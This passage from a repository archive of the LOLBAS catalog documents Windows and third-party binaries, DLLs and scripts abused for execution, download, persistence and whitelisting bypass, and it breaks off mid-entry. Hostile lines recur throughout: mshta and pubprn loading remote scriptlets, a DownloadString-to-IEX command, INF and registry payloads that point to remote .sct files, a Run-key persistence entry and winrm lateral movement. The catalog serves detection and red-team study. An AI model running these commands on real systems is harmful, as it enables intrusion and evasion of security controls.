wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
Executes JScript or VBScript embedded in the target remote XSL stylesheet.
```

* Resources:
  * https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
  * https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
  * https://twitter.com/subTee/status/986234811944648707

* Full path:
  * c:\windows\system32\wbem\wmic.exe
  * c:\windows\sysWOW64\wbem\wmic.exe

* Notes:
Thanks to Casey Smith - @subtee

================================================
FILE: Archive-Old-Version/OSBinaries/Wab.exe.md
================================================
## Wab.exe

* Functions: Execute

```
Wab.exe
Loads a DLL configured in the registry under HKLM.
```

* Resources:
  * http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
  * https://twitter.com/Hexacorn/status/991447379864932352

* Full path:
  * C:\Program Files\Windows Mail\wab.exe
  * C:\Program Files (x86)\Windows Mail\wab.exe

* Notes:
Thanks to Adam - @Hexacorn
Requires registry changes, Requires Administrative Access

================================================
FILE: Archive-Old-Version/OSBinaries/Wscript.exe.md
================================================
## Wscript.exe

* Functions: Execute, Read ADS

```
wscript c:\ads\file.txt:script.vbs
Executes the .VBS script stored as an Alternate Data Stream (ADS).
```

* Resources:
  * ?

* Full path:
  * c:\windows\system32\wscript.exe
  * c:\windows\sysWOW64\wscript.exe

* Notes:
Thanks to ?

================================================
FILE: Archive-Old-Version/OSBinaries/Xwizard.exe.md
================================================
## Xwizard.exe

* Functions: DLL hijack, Execute

```
xwizard.exe
Xwizard.exe will load a .DLL file located in the same directory (DLL Hijack) named xwizards.dll.

xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
Xwizard.exe running a custom class that has been added to the registry.
```

* Resources:
  * http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
  * https://www.youtube.com/watch?v=LwDHX7DVHWU
  * https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5

* Full path:
  * c:\windows\system32\xwizard.exe
  * c:\windows\sysWOW32\xwizard.exe

* Notes:
Thanks to Adam - @Hexacorn, Nick Tyrer - @nicktyrer

================================================
FILE: Archive-Old-Version/OSBinaries/hh.exe.md
================================================
## hh.exe

* Functions: Download, Execute

```
HH.exe http://www.google.com
Opens Google's web page with HTML Help.

HH.exe C:\
Opens c:\\ with HTML Help.

HH.exe c:\windows\system32\calc.exe
Opens calc.exe with HTML Help.

HH.exe http://some.url/script.ps1
Open the target PowerShell script with HTML Help.
```

* Resources:
  * https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/

* Full path:
  * c:\windows\system32\hh.exe
  * c:\windows\sysWOW64\hh.exe

* Notes:
Thanks to Oddvar Moe - @oddvarmoe

================================================
FILE: Archive-Old-Version/OSBinaries/mshta.exe.md
================================================
## mshta.exe

* Functions: Execute, Read ADS

```
mshta.exe evilfile.hta
Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.

mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
Executes VBScript supplied as a command line argument.

mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
Executes JavaScript supplied as a command line argument.

mshta.exe "C:\ads\file.txt:file.hta"
Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
```

* Resources:
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md
  * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
  * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
  * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/

* Full path:
  * C:\Windows\System32\mshta.exe
  * C:\Windows\SysWOW64\mshta.exe

* Notes:
Thanks to Casey Smith - @subtee, Oddvar Moe - @oddvarmoe

================================================
FILE: Archive-Old-Version/OSBinaries/odbcconf.exe.md
================================================
## odbcconf.exe

* Functions: Execute

```
odbcconf -f file.rsp
Load DLL specified in target .RSP file.
```

* Resources:
  * https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
  * https://github.com/woanware/application-restriction-bypasses
  * https://twitter.com/subTee/status/789459826367606784

* Full path:
  * c:\windows\system32\odbcconf.exe
  * c:\windows\sysWOW64\odbcconf.exe

* Notes:
Thanks to Casey Smith - @subtee, Nick Tyrer - @NickTyrer
See the Payloads folder for an example .RSP file.

================================================
FILE: Archive-Old-Version/OSBinaries/reg.exe.md
================================================
## reg.exe

* Functions: Export Reg, Add ADS, Import Reg

```
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
Export the target Registry key and save it to the specified .REG file.
```

* Resources:
  * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

* Full path:
  * c:\windows\system32\reg.exe
  * c:\windows\sysWOW64\reg.exe

* Notes:
Thanks to Oddvar Moe - @oddvarmoe

================================================
FILE: Archive-Old-Version/OSBinaries/regedit.exe.md
================================================
## regedit.exe

* Functions: Write ADS, Read ADS, Import registry

```
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
Export the target Registry key to the specified .REG file.

regedit C:\ads\file.txt:regfile.reg
Import the target .REG file into the Registry.
```

* Resources:
  * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

* Full path:
  * C:\Windows\System32\regedit.exe
  * C:\Windows\SysWOW64\regedit.exe

* Notes:
Thanks to Oddvar Moe - @oddvarmoe

================================================
FILE: Archive-Old-Version/OSLibraries/Advpack.dll.md
================================================
## Advpack.dll

* Functions: Execute

```
rundll32.exe advpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1,
Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified).
rundll32.exe advpack.dll,LaunchINFSection test.inf,,1,
Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied).

rundll32.exe Advpack.dll,RegisterOCX calc.exe
Launch executable by calling the RegisterOCX function.

rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
Launch executable by calling the RegisterOCX function.

rundll32.exe Advpack.dll,RegisterOCX test.dll
Launch a DLL payload by calling the RegisterOCX function.
```

* Resources:
  * https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
  * https://twitter.com/ItsReallyNick/status/967859147977850880
  * https://twitter.com/bohops/status/974497123101179904
  * https://twitter.com/moriarty_meng/status/977848311603380224

* Full path:
  * c:\windows\system32\advpack.dll
  * c:\windows\sysWOW64\advpack.dll

* Notes:
Thanks to Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL), Moriarty @moriarty_meng (RegisterOCX - Cmd)

================================================
FILE: Archive-Old-Version/OSLibraries/Ieadvpack.dll.md
================================================
## Ieadvpack.dll

* Functions: Execute

```
rundll32.exe IEAdvpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1,
Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified).

rundll32.exe IEAdvpack.dll,LaunchINFSection test.inf,,1,
Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied).

rundll32.exe IEAdvpack.dll,RegisterOCX calc.exe
Launch executable by calling the RegisterOCX function.

rundll32.exe IEAdvpack.dll,RegisterOCX test.dll
Launch a DLL payload by calling the RegisterOCX function.
```

* Resources:
  * https://twitter.com/pabraeken/status/991695411902599168
  * https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
  * https://twitter.com/0rbz_/status/974472392012689408

* Full path:
  * c:\windows\system32\ieadvpack.dll
  * c:\windows\sysWOW64\ieadvpack.dll

* Notes:
Thanks to Pierre-Alexandre Braeken - @pabraeken (RegisterOCX - Cmd), Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL)

================================================
FILE: Archive-Old-Version/OSLibraries/Ieframe.dll.md
================================================
## Ieframe.dll

* Functions: Execute

```
rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.

rundll32.exe ieframe.dll,OpenURL c:\\test\\calc-url-file.zz
Renamed URL file.
```

* Resources:
  * http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
  * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
  * https://twitter.com/bohops/status/997690405092290561

* Full path:
  * c:\windows\system32\Ieframe.dll
  * c:\windows\sysWOW64\Ieframe.dll

* Notes:
Thanks to Adam - @hexacorn, Jimmy - @bohops

================================================
FILE: Archive-Old-Version/OSLibraries/Mshtml.dll.md
================================================
## Mshtml.dll

* Functions: Execute

```
rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
Invoke an HTML Application. Note - Pops a security warning and a print dialogue box.
```

* Resources:
  * https://twitter.com/pabraeken/status/998567549670477824

* Full path:
  * c:\windows\system32\Mshtml.dll
  * c:\windows\sysWOW64\Mshtml.dll

* Notes:
Thanks to Pierre-Alexandre Braeken - @pabraeken

================================================
FILE: Archive-Old-Version/OSLibraries/Payload/Advpack.inf
================================================
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"

================================================
FILE: Archive-Old-Version/OSLibraries/Payload/Advpack_calc.sct
================================================

================================================
FILE: Archive-Old-Version/OSLibraries/Payload/Ieadvpack.inf
================================================
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"

================================================
FILE: Archive-Old-Version/OSLibraries/Payload/Ieadvpack_calc.sct
================================================

================================================
FILE: Archive-Old-Version/OSLibraries/Pcwutl.dll.md
================================================
## Pcwutl.dll

* Functions: Execute

```
rundll32.exe pcwutl.dll,LaunchApplication calc.exe
Launch executable by calling the LaunchApplication function.
```

* Resources:
  * https://twitter.com/harr0ey/status/989617817849876488

* Full path:
  * c:\windows\system32\Pcwutl.dll
  * c:\windows\sysWOW64\Pcwutl.dll

* Notes:
Thanks to Matt harr0ey - @harr0ey

================================================
FILE: Archive-Old-Version/OSLibraries/Setupapi.dll.md
================================================
## Setupapi.dll

* Functions: Execute

```
rundll32 setupapi,InstallHinfSection DefaultInstall 132 c:\temp\calc.inf
Launch an executable file via the InstallHinfSection function and .inf file section directive.

rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\shady.inf
Remote fetch and execute a COM Scriptlet by calling an information file directive.
```

* Resources:
  * https://twitter.com/pabraeken/status/994742106852941825
  * https://twitter.com/subTee/status/951115319040356352
  * https://twitter.com/KyleHanslovan/status/911997635455852544
  * https://github.com/huntresslabs/evading-autoruns

* Full path:
  * c:\windows\system32\Setupapi.dll
  * c:\windows\sysWOW64\Setupapi.dll

* Notes:
Thanks to Pierre-Alexandre Braeken - @pabraeken (Executable), Kyle Hanslovan - @KyleHanslovan (COM Scriptlet), Huntress Labs - @HuntressLabs (COM Scriptlet), Casey Smith - @subTee (COM Scriptlet)

================================================
FILE: Archive-Old-Version/OSLibraries/Shdocvw.dll.md
================================================
## Shdocvw.dll

* Functions: Execute

```
rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.

rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.zz"
Renamed URL file.
```

* Resources:
  * http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
  * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
  * https://twitter.com/bohops/status/997690405092290561

* Full path:
  * c:\windows\system32\Shdocvw.dll
  * c:\windows\sysWOW64\Shdocvw.dll

* Notes:
Thanks to Adam - @hexacorn, Jimmy - @bohops

================================================
FILE: Archive-Old-Version/OSLibraries/Shell32.dll.md
================================================
## Shell32.dll

* Functions: Execute

```
rundll32.exe shell32.dll,Control_RunDLL payload.dll
Launch DLL payload.

rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
Launch executable payload.

rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"
Launch executable payload with arguments.
```

* Resources:
  * https://twitter.com/Hexacorn/status/885258886428725250
  * https://twitter.com/pabraeken/status/991768766898941953
  * https://twitter.com/mattifestation/status/776574940128485376
  * https://twitter.com/KyleHanslovan/status/905189665120149506

* Full path:
  * c:\windows\system32\shell32.dll
  * c:\windows\sysWOW64\shell32.dll

* Notes:
Thanks to Adam - @hexacorn (Control_RunDLL), Pierre-Alexandre Braeken - @pabraeken (ShellExec_RunDLL), Matt Graeber - @mattifestation (ShellExec_RunDLL), Kyle Hanslovan - @KyleHanslovan (ShellExec_RunDLL)

================================================
FILE: Archive-Old-Version/OSLibraries/Syssetup.dll.md
================================================
## Syssetup.dll

* Functions: Execute

```
rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.INF
Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\\test\\shady.inf
Remote fetch and execute a COM Scriptlet by calling an information file directive.
```

* Resources:
  * https://twitter.com/pabraeken/status/994392481927258113
  * https://twitter.com/harr0ey/status/975350238184697857
  * https://twitter.com/bohops/status/975549525938135040

* Full path:
  * c:\windows\system32\Syssetup.dll
  * c:\windows\sysWOW64\Syssetup.dll

* Notes:
Thanks to Pierre-Alexandre Braeken - @pabraeken (Execute), Matt harr0ey - @harr0ey (Execute), Jimmy - @bohops (COM Scriptlet)

================================================
FILE: Archive-Old-Version/OSLibraries/Url.dll.md
================================================
## Url.dll

* Functions: Execute

```
rundll32.exe url.dll,OpenURL "C:\\test\\calc.hta"
Launch a HTML application payload by calling OpenURL.

rundll32.exe url.dll,OpenURL "C:\\test\\calc.url"
Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.

rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Launch an executable payload by calling OpenURL.

rundll32.exe url.dll,FileProtocolHandler calc.exe
Launch an executable payload by calling FileProtocolHandler.

rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta
Launch a HTML application payload by calling FileProtocolHandler.

rundll32 url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Launch an executable payload by calling FileProtocolHandler.
``` * Resources: * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ * https://twitter.com/bohops/status/974043815655956481 * https://twitter.com/DissectMalware/status/995348436353470465 * https://twitter.com/yeyint_mth/status/997355558070927360 * https://twitter.com/Hexacorn/status/974063407321223168 * Full path: * c:\windows\system32\url.dll * c:\windows\sysWOW64\url.dll * Notes: Thanks to Jimmy - @bohops (OpenURL), Adam - @hexacorn (OpenURL), Malwrologist - @DissectMalware (FileProtocolHandler - HTA), r0lan - @yeyint_mth (Obfuscation) ================================================ FILE: Archive-Old-Version/OSLibraries/Zipfldr.dll.md ================================================ ## Zipfldr.dll * Functions: Execute ``` rundll32.exe zipfldr.dll,RouteTheCall calc.exe Launch an executable payload by calling RouteTheCall. rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Launch an executable payload by calling RouteTheCall. ``` * Resources: * https://twitter.com/moriarty_meng/status/977848311603380224 * https://twitter.com/bohops/status/997896811904929792 * Full path: * c:\windows\system32\zipfldr.dll * c:\windows\sysWOW64\zipfldr.dll * Notes: Thanks to Moriarty - @moriarty_meng (Execute), r0lan - @yeyint_mth (Obfuscation) ================================================ FILE: Archive-Old-Version/OSScripts/CL_Invocation.ps1.md ================================================ ## CL_Invocation.ps1 * Functions: Execute ``` . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \nSyncInvoke [args] Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable. 
```

* Resources:
  * https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
  * https://twitter.com/bohops/status/948548812561436672
  * https://twitter.com/pabraeken/status/995107879345704961
* Full path:
  * C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
  * C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
  * C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
* Notes: Thanks to Jimmy - @bohops (Execute), Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate Paths)

================================================
FILE: Archive-Old-Version/OSScripts/CL_Mutexverifiers.ps1.md
================================================
## CL_Mutexverifiers.ps1

* Functions: Execute

```
. C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1 runAfterCancelProcess calc.ps1
Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable.
```

* Resources:
  * https://twitter.com/pabraeken/status/995111125447577600
* Full path:
  * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
  * C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate)

================================================
FILE: Archive-Old-Version/OSScripts/Manage-bde.wsf.md
================================================
## Manage-bde.wsf

* Functions: Execute

```
set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf
Set the comspec variable to another executable prior to calling manage-bde.wsf for execution.

copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf
Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.
```

* Resources:
  * https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
  * https://twitter.com/bohops/status/980659399495741441
* Full path:
  * C:\Windows\System32\manage-bde.wsf
* Notes: Thanks to Jimmy - @bohops (Comspec), Daniel Bohannon - @danielhbohannon (Path Hijack)

================================================
FILE: Archive-Old-Version/OSScripts/Payload/Pubprn_calc.sct
================================================

================================================
FILE: Archive-Old-Version/OSScripts/Payload/Slmgr.reg
================================================
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
@=""

[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@="Scripting.Dictionary"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
@="C:\\WINDOWS\\system32\\scrobj.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
@="Scripting.Dictionary"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
@="https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
@="Scripting.Dictionary"

================================================
FILE: Archive-Old-Version/OSScripts/Payload/Slmgr_calc.sct
================================================

================================================
FILE: Archive-Old-Version/OSScripts/Pubprn.vbs.md
================================================
## Pubprn.vbs

* Functions: Execute

```
pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection.
```

* Resources:
  * https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
  * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
  * https://github.com/enigma0x3/windows-operating-system-archaeology
* Full path:
  * C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
  * C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
* Notes: Thanks to Matt Nelson - @enigma0x3

================================================
FILE: Archive-Old-Version/OSScripts/Slmgr.vbs.md
================================================
## Slmgr.vbs

* Functions: Execute

```
reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs
Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
```

* Resources:
  * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
  * https://www.youtube.com/watch?v=3gz1QmiMhss
* Full path:
  * c:\windows\system32\slmgr.vbs
  * c:\windows\sysWOW64\slmgr.vbs
* Notes: Thanks to Matt Nelson - @enigma0x3, Casey Smith - @subTee

================================================
FILE: Archive-Old-Version/OSScripts/SyncAppvPublishingServer.vbs.md
================================================
## SyncAppvPublishingServer.vbs

* Functions: Execute

```
SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
Inject PowerShell script code with the provided arguments.
```

* Resources:
  * https://twitter.com/monoxgas/status/895045566090010624
  * https://twitter.com/subTee/status/855738126882316288
* Full path:
  * C:\Windows\System32\SyncAppvPublishingServer.vbs
* Notes: Thanks to Nick Landers - @monoxgas, Casey Smith - @subTee

================================================
FILE: Archive-Old-Version/OSScripts/Winrm.vbs.md
================================================
## Winrm.vbs

* Functions: Execute

```
reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig
Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.

winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985
Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol.

winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985
winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985
Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol.
```

* Resources:
  * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
  * https://www.youtube.com/watch?v=3gz1QmiMhss
  * https://github.com/enigma0x3/windows-operating-system-archaeology
  * https://redcanary.com/blog/lateral-movement-winrm-wmi/
  * https://twitter.com/bohops/status/994405551751815170
* Full path:
  * C:\windows\system32\winrm.vbs
  * C:\windows\SysWOW64\winrm.vbs
* Notes: Thanks to Matt Nelson - @enigma0x3 (Hijack), Casey Smith - @subtee (Hijack), Red Canary Company cc Tony Lambert - @redcanaryco (Win32_Process LM), Jimmy - @bohops (Win32_Service LM)

================================================
FILE: Archive-Old-Version/OSScripts/pester.bat.md
================================================
## pester.bat

* Functions: Execute code using Pester. The third parameter can be anything. The fourth is the payload.

```
Pester.bat [/help|?|-?|/?] "$null; notepad"
Execute notepad.
```

* Resources:
  * https://twitter.com/Oddvarmoe/status/993383596244258816
  * https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/pester.md
* Full path:
  * c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
  * c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
* Notes: Thanks to Emin Atac - @p0w3rsh3ll

================================================
FILE: Archive-Old-Version/OtherBinaries/AcroRd32.exe.md
================================================
## AcroRd32.exe

* Functions: Execute

```
Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
Hijack RdrCEF.exe with a payload executable to launch when opening Adobe.
```

* Resources:
  * https://twitter.com/pabraeken/status/997997818362155008
* Full path:
  * C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

================================================
FILE: Archive-Old-Version/OtherBinaries/Gpup.exe.md
================================================
## Gpup.exe

* Functions: Execute

```
Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
Execute another command through gpup.exe (Notepad++ binary).
```

* Resources:
  * https://twitter.com/pabraeken/status/997892519827558400
* Full path:
  * C:\Program Files (x86)\Notepad++\updater\gpup.exe
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

================================================
FILE: Archive-Old-Version/OtherBinaries/Nlnotes.exe.md
================================================
## Nlnotes.exe

* Functions: Execute

```
NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Run PowerShell via LotusNotes.
```

* Resources:
  * https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
  * https://twitter.com/HanseSecure/status/995578436059127808
* Full path:
  * C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe
* Notes: Thanks to Daniel Bohannon - @danielhbohannon

================================================
FILE: Archive-Old-Version/OtherBinaries/Notes.exe.md
================================================
## Notes.exe

* Functions: Execute

```
Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Run PowerShell via LotusNotes.
```

* Resources:
  * https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
  * https://twitter.com/HanseSecure/status/995578436059127808
* Full path:
  * C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe
* Notes: Thanks to Daniel Bohannon - @danielhbohannon

================================================
FILE: Archive-Old-Version/OtherBinaries/Nvudisp.exe.md
================================================
## Nvudisp.exe

* Functions: Execute, Copy, Add registry, Create shortcut, kill process

```
Nvudisp.exe System calc.exe
Execute calc.exe as a subprocess.

Nvudisp.exe Copy test.txt,test-2.txt
Copy file A to file B.

Nvudisp.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
Add/Edit a Registry key value.

Nvudisp.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe\","","c:\windows\system32\"
Create shortcut file.

Nvudisp.exe KillApp calculator.exe
Kill a process.

Nvudisp.exe Run foo
Run process.
```

* Resources:
  * http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
* Full path:
  * C:\windows\system32\nvuDisp.exe
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

================================================
FILE: Archive-Old-Version/OtherBinaries/Nvuhda6.exe.md
================================================
## Nvuhda6.exe

* Functions: Execute, Copy, Add registry, Create shortcut, kill process

```
nvuhda6.exe System calc.exe
Execute calc.exe as a subprocess.

nvuhda6.exe Copy test.txt,test-2.txt
Copy file A to file B.

nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
Add/Edit a Registry key value.

nvuhda6.exe CreateShortcut test.lnk,"Test","C:\Windows\System32\calc.exe","","C:\Windows\System32\"
Create shortcut file.

nvuhda6.exe KillApp calc.exe
Kill a process.

nvuhda6.exe Run foo
Run process.
```

* Resources:
  * http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
* Full path:
  * Missing
* Notes: Thanks to Adam - @hexacorn

================================================
FILE: Archive-Old-Version/OtherBinaries/ROCCAT_Swarm.exe.md
================================================
## ROCCAT_Swarm.exe

* Functions: Execute

```
Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe.
```

* Resources:
  * https://twitter.com/pabraeken/status/994213164484001793
* Full path:
  * C:\Program Files (x86)\ROCCAT\ROCCAT Swarm\
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

================================================
FILE: Archive-Old-Version/OtherBinaries/Setup.exe.md
================================================
## Setup.exe

* Functions: Execute

```
Run Setup.exe
Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
```

* Resources:
  * https://twitter.com/pabraeken/status/994381620588236800
* Full path:
  * C:\LJ-Ent-700-color-MFP-M775-Full-Solution-15315
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

================================================
FILE: Archive-Old-Version/OtherBinaries/Usbinst.exe.md
================================================
## Usbinst.exe

* Functions: Execute

```
Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
Execute calc.exe through the DefaultInstall section directive in an INF file.
```

* Resources:
  * https://twitter.com/pabraeken/status/993514357807108096
* Full path:
  * C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

================================================
FILE: Archive-Old-Version/OtherBinaries/VBoxDrvInst.exe.md
================================================
## VBoxDrvInst.exe

* Functions: Persistence

```
